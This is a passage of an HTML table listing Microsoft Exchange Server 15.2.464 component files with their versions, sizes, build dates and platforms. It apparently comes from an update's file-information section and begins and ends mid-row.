applicable</td></tr><tr><td>Mce.dll</td><td>15.2.464.10</td><td>1,693,776</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Measure_storeusagestatistics.ps1</td><td>Not applicable</td><td>29,779</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Merge_publicfoldermailbox.ps1</td><td>Not applicable</td><td>22,915</td><td>01-Jan-2020</td><td>10:49</td><td>Not applicable</td></tr><tr><td>Microsoft.database.isam.dll</td><td>15.2.464.10</td><td>128,080</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.dkm.proxy.dll</td><td>15.2.464.10</td><td>25,984</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.activemonitoringvariantconfig.dll</td><td>15.2.464.10</td><td>68,688</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.activemonitoring.eventlog.dll</td><td>15.2.464.10</td><td>17,792</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.addressbook.service.dll</td><td>15.2.464.11</td><td>233,544</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.addressbook.service.eventlog.dll</td><td>15.2.464.10</td><td>15,736</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.airsyncmsg.dll</td><td>15.2.464.10</td><td>43,384</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.airsync.comon.dll</td><td>15.2.464.10</td><td>1,776,000</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.airsync.dll1</td><td>15.2.464.11</td><td>505,216</td><td>01-Jan-2020</td><td>10:47</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.airsynchandler.dll</td><td>15.2.464.11</td><td>76,152</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.anchorservice.dll</td><td>15.2.464.10</td><td>135,544</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.antispam.eventlog.dll</td><td>15.2.464.10</td><td>23,416</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdate.eventlog.dll</td><td>15.2.464.10</td><td>15,952</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.antispamupdatesvc.exe</td><td>15.2.464.10</td><td>27,008</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.approval.applications.dll</td><td>15.2.464.10</td><td>53,624</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.dll</td><td>15.2.464.10</td><td>925,264</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.assistants.eventlog.dll</td><td>15.2.464.10</td><td>26,192</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.assistants.interfaces.dll</td><td>15.2.464.10</td><td>43,392</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.audit.azureclient.dll</td><td>15.2.464.11</td><td>15,440</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditlogsearch.eventlog.dll</td><td>15.2.464.10</td><td>14,712</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.auditlogsearchservicelet.dll</td><td>15.2.464.11</td><td>70,520</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditstoragemonitorservicelet.dll</td><td>15.2.464.11</td><td>94,584</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.auditstoragemonitorservicelet.eventlog.dll</td><td>15.2.464.10</td><td>13,384</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.authadmin.eventlog.dll</td><td>15.2.464.10</td><td>15,944</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.authadminservicelet.dll</td><td>15.2.464.11</td><td>36,728</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.authservicehostservicelet.dll</td><td>15.2.464.10</td><td>15,944</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.configuration.dll</td><td>15.2.464.10</td><td>79,736</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.dll</td><td>15.2.464.10</td><td>396,152</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.autodiscover.eventlogs.dll</td><td>15.2.464.10</td><td>21,368</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.autodiscoverv2.dll</td><td>15.2.464.10</td><td>57,216</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.bandwidthmonitorservicelet.dll</td><td>15.2.464.10</td><td>14,720</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.batchservice.dll</td><td>15.2.464.10</td><td>35,912</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.cabutility.dll</td><td>15.2.464.10</td><td>276,344</td><td>01-Jan-2020</td><td>10:48</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeployment.eventlog.dll</td><td>15.2.464.10</td><td>16,248</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatedeploymentservicelet.dll</td><td>15.2.464.11</td><td>26,192</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.certificatenotification.eventlog.dll</td><td>15.2.464.10</td><td>13,688</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.certificatenotificationservicelet.dll</td><td>15.2.464.11</td><td>23,424</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.common.dll</td><td>15.2.464.10</td><td>376,904</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.eventlogs.dll</td><td>15.2.464.10</td><td>83,840</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.clients.owa.dll</td><td>15.2.464.11</td><td>2,971,008</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.owa2.server.dll</td><td>15.2.464.11</td><td>5,029,760</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.owa2.servervariantconfiguration.dll</td><td>15.2.464.10</td><td>893,816</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.security.dll</td><td>15.2.464.11</td><td>413,560</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.clients.strings.dll</td><td>15.2.464.10</td><td>924,536</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.bandwidthmonitor.dll</td><td>15.2.464.10</td><td>31,608</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.common.dll</td><td>15.2.464.10</td><td>52,296</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.common.extensions.dll</td><td>15.2.464.10</td><td>21,880</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.diskmonitor.dll</td><td>15.2.464.10</td><td>33,664</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replay.dll</td><td>15.2.464.10</td><td>3,515,264</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.cluster.replicaseeder.dll</td><td>15.2.464.10</td><td>108,408</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.cluster.replicavsswriter.dll</td><td>15.2.464.10</td><td>288,872</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.cluster.shared.dll</td><td>15.2.464.10</td><td>625,536</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.agentconfig.transport.dll</td><td>15.2.464.10</td><td>86,400</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.componentconfig.transport.dll</td><td>15.2.464.10</td><td>1,830,272</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.adagentservicevariantconfig.dll</td><td>15.2.464.10</td><td>31,608</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.directoryvariantconfig.dll</td><td>15.2.464.10</td><td>465,784</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.domtvariantconfig.dll</td><td>15.2.464.10</td><td>25,472</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.ismemberofresolverconfig.dll</td><td>15.2.464.10</td><td>38,272</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.tenantrelocationvariantconfig.dll</td><td>15.2.464.10</td><td>102,784</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.directory.topologyservicevariantconfig.dll</td><td>15.2.464.10</td><td>48,512</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.diskmanagement.dll</td><td>15.2.464.10</td><td>67,448</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.dll</td><td>15.2.464.10</td><td>173,136</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.encryption.variantconfig.dll</td><td>15.2.464.10</td><td>113,536</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.il.dll</td><td>15.2.464.10</td><td>13,904</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.inference.dll</td><td>15.2.464.10</td><td>130,632</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.optics.dll</td><td>15.2.464.10</td><td>63,864</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.processmanagermsg.dll</td><td>15.2.464.10</td><td>20,048</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.protocols.popimap.dll</td><td>15.2.464.10</td><td>15,440</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.dll</td><td>15.2.464.10</td><td>108,920</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.search.eventlog.dll</td><td>15.2.464.10</td><td>17,792</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.common.smtp.dll</td><td>15.2.464.10</td><td>51,584</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.suiteservices.suiteservicesvariantconfig.dll</td><td>15.2.464.10</td><td>36,936</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.azure.dll</td><td>15.2.464.10</td><td>27,720</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.common.transport.monitoringconfig.dll</td><td>15.2.464.10</td><td>1,042,504</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.commonmsg.dll</td><td>15.2.464.10</td><td>29,256</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditlogpumper.messages.dll</td><td>15.2.464.10</td><td>13,176</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.core.dll</td><td>15.2.464.11</td><td>181,120</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.auditservice.messages.dll</td><td>15.2.464.10</td><td>30,080</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.common.dll</td><td>15.2.464.10</td><td>22,600</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.crimsonevents.dll</td><td>15.2.464.10</td><td>85,888</td><td>01-Jan-2020</td><td>10:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.compliance.dll</td><td>15.2.464.10</td><td>41,336</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.recordreview.dll</td><td>15.2.464.10</td><td>37,248</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.supervision.dll</td><td>15.2.464.10</td><td>50,552</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskcreator.dll</td><td>15.2.464.10</td><td>33,152</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributioncommon.dll</td><td>15.2.464.10</td><td>1,100,672</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskdistributionfabric.dll</td><td>15.2.464.10</td><td>206,720</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compliance.taskplugins.dll</td><td>15.2.464.10</td><td>211,016</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.compression.dll</td><td>15.2.464.10</td><td>17,280</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.dll</td><td>15.2.464.10</td><td>37,752</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.certificateauth.eventlog.dll</td><td>15.2.464.10</td><td>14,416</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.core.dll</td><td>15.2.464.10</td><td>145,784</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.core.eventlog.dll</td><td>15.2.464.10</td><td>14,200</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.dll</td><td>15.2.464.10</td><td>53,352</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.delegatedauth.eventlog.dll</td><td>15.2.464.10</td><td>15,736</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.dll</td><td>15.2.464.10</td><td>23,416</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.diagnosticsmodules.eventlog.dll</td><td>15.2.464.10</td><td>13,184</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.failfast.dll</td><td>15.2.464.10</td><td>54,656</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.failfast.eventlog.dll</td><td>15.2.464.10</td><td>13,904</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.dll</td><td>15.2.464.10</td><td>1,845,832</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.objectmodel.eventlog.dll</td><td>15.2.464.10</td><td>30,280</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.dll</td><td>15.2.464.10</td><td>68,472</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.redirectionmodule.eventlog.dll</td><td>15.2.464.10</td><td>15,440</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.dll</td><td>15.2.464.10</td><td>21,368</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.configuration.remotepowershellbackendcmdletproxymodule.eventlog.dll</td><td>15.2.464.10</td><td>13,176</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.connectiondatacollector.dll</td><td>15.2.464.10</td><td>25,976</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.common.dll</td><td>15.2.464.10</td><td>170,064</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.eas.dll</td><td>15.2.464.10</td><td>330,112</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.imap.dll</td><td>15.2.464.10</td><td>173,944</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.connections.pop.dll</td><td>15.2.464.10</td><td>71,040</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.contentfilter.wrapper.exe</td><td>15.2.464.10</td><td>203,640</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.context.client.dll</td><td>15.2.464.10</td><td>27,208</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.configuration.dll</td><td>15.2.464.10</td><td>51,792</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.core.dll</td><td>15.2.464.10</td><td>51,072</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.context.datamodel.dll</td><td>15.2.464.10</td><td>46,968</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.strings.dll</td><td>15.2.464.10</td><td>1,093,504</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.core.timezone.dll</td><td>15.2.464.10</td><td>57,208</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.deep.dll</td><td>15.2.464.10</td><td>326,528</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.dll</td><td>15.2.464.10</td><td>3,353,160</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.eventlog.dll</td><td>15.2.464.10</td><td>35,712</td><td>01-Jan-2020</td><td>10:49</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.applicationlogic.monitoring.ifx.dll</td><td>15.2.464.10</td><td>17,784</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.connectors.dll</td><td>15.2.464.10</td><td>165,240</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.consumermailboxprovisioning.dll</td><td>15.2.464.10</td><td>619,384</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.dll</td><td>15.2.464.10</td><td>7,787,592</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.directory.eventlog.dll</td><td>15.2.464.10</td><td>80,248</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.dll</td><td>15.2.464.10</td><td>1,789,304</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.groupmailboxaccesslayer.dll</td><td>15.2.464.10</td><td>1,626,496</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.ha.dll</td><td>15.2.464.10</td><td>375,168</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.imageanalysis.dll</td><td>15.2.464.10</td><td>105,856</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxfeatures.dll</td><td>15.2.464.10</td><td>15,944</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mailboxloadbalance.dll</td><td>15.2.464.10</td><td>224,848</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.mapi.dll</td><td>15.2.464.10</td><td>186,752</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.metering.contracts.dll</td><td>15.2.464.10</td><td>39,808</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.metering.dll</td><td>15.2.464.10</td><td>119,376</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.msosyncxsd.dll</td><td>15.2.464.10</td><td>968,064</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.notification.dll</td><td>15.2.464.10</td><td>141,184</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.personaldataplatform.dll</td><td>15.2.464.10</td><td>769,608</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.providers.dll</td><td>15.2.464.10</td><td>139,856</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.provisioning.dll</td><td>15.2.464.10</td><td>56,704</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.rightsmanagement.dll</td><td>15.2.464.10</td><td>452,992</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.scheduledtimers.dll</td><td>15.2.464.10</td><td>32,872</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.clientstrings.dll</td><td>15.2.464.10</td><td>256,888</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.dll</td><td>15.2.464.10</td><td>11,808,848</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storage.eventlog.dll</td><td>15.2.464.10</td><td>37,760</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.storageconfigurationresources.dll</td><td>15.2.464.10</td><td>655,736</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.storeobjects.dll</td><td>15.2.464.10</td><td>175,696</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.dll</td><td>15.2.464.10</td><td>36,216</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.client.eventlog.dll</td><td>15.2.464.10</td><td>14,440</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.data.throttlingservice.eventlog.dll</td><td>15.2.464.10</td><td>14,200</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenter.management.activemonitoring.recoveryservice.eventlog.dll</td><td>15.2.464.10</td><td>14,712</td><td>01-Jan-2020</td><td>10:47</td><td>x64</td></tr><tr><td>Microsoft.exchange.datacenterstrings.dll</td><td>15.2.464.11</td><td>72,784</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.delivery.eventlog.dll</td><td>15.2.464.10</td><td>13,176</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.certificatelogger.dll</td><td>15.2.464.10</td><td>23,120</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.dll</td><td>15.2.464.10</td><td>2,212,944</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.performancelogger.dll</td><td>15.2.464.10</td><td>23,928</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.common.dll</td><td>15.2.464.10</td><td>546,888</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.eventlog.dll</td><td>15.2.464.10</td><td>215,416</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exchangejobs.dll</td><td>15.2.464.10</td><td>194,424</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.exe</td><td>15.2.464.10</td><td>146,512</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnostics.service.fuseboxperfcounters.dll</td><td>15.2.464.10</td><td>27,520</td><td>01-Jan-2020</td><td>10:47</td><td>x86</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregation.eventlog.dll</td><td>15.2.464.10</td><td>13,688</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.diagnosticsaggregationservicelet.dll</td><td>15.2.464.10</td><td>49,536</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.eventlog.dll</td><td>15.2.464.10</td><td>28,264</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.directory.topologyservice.exe</td><td>15.2.464.10</td><td>208,760</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.disklocker.events.dll</td><td>15.2.464.10</td><td>89,168</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.disklocker.interop.dll</td><td>15.2.464.10</td><td>32,640</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.calendarmigration.dll</td><td>15.2.464.10</td><td>45,944</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.drumtesting.common.dll</td><td>15.2.464.10</td><td>18,816</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.dll</td><td>15.2.464.10</td><td>473,680</td><td>01-Jan-2020</td><td>10:49</td><td>x86</td></tr><tr><td>Microsoft.exchange.dxstore.ha.events.dll</td><td>15.2.464.10</td><td>206,200</td><td>01-Jan-2020</td><td>10:51</td><td>x64</td></tr><tr><td>Microsoft.exchange.dxstore.ha.instance.exe</td><td>15.2.464.10</td><td>36,736</td><td>01-Jan-2020</td><td>10:50</td><td>x86</td></tr><tr><td>Microsoft.exchange.eac.flighting.dll</td><td>15.2.464.10</td><td>131,664</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgecredentialsvc.exe</td><td>15.2.464.10</td><td>21,880</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.common.dll</td><td>15.2.464.10</td><td>148,344</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.datacenterproviders.dll</td><td>15.2.464.10</td><td>220,024</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.edgesync.eventlog.dll</td><td>15.2.464.10</td><td>23,928</td><td>01-Jan-2020</td><td>10:50</td><td>x64</td></tr><tr><td>Microsoft.exchange.edgesyncsvc.exe</td><td>15.2.464.10</td><td>97,872</td><td>01-Jan-2020</td><td>10:51</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll</td><td>15.2.464.11</td><td>1,266,040</td><td>01-Jan-2020</td><td>10:48</td><td>x86</td></tr><tr><td>Microsoft.exchange.ediscovery.export.dll.deploy</td><td>15.2.464.11</td><td>1,266,040</td><td>01-Jan-2020</td><td>10:48</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.application</td><td>Not applicable</td><td>16,323</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.exe.deploy</td><td>15.2.464.11</td><td>87,632</td><td>01-Jan-2020</td><td>10:51</td><td>Not applicable</td></tr><tr><td>Microsoft.exchange.ediscovery.exporttool.manifest</td><td>Not applicable</td><td>66,586</td><td>01-Jan-2020</td><td>10:51</td><td>Not 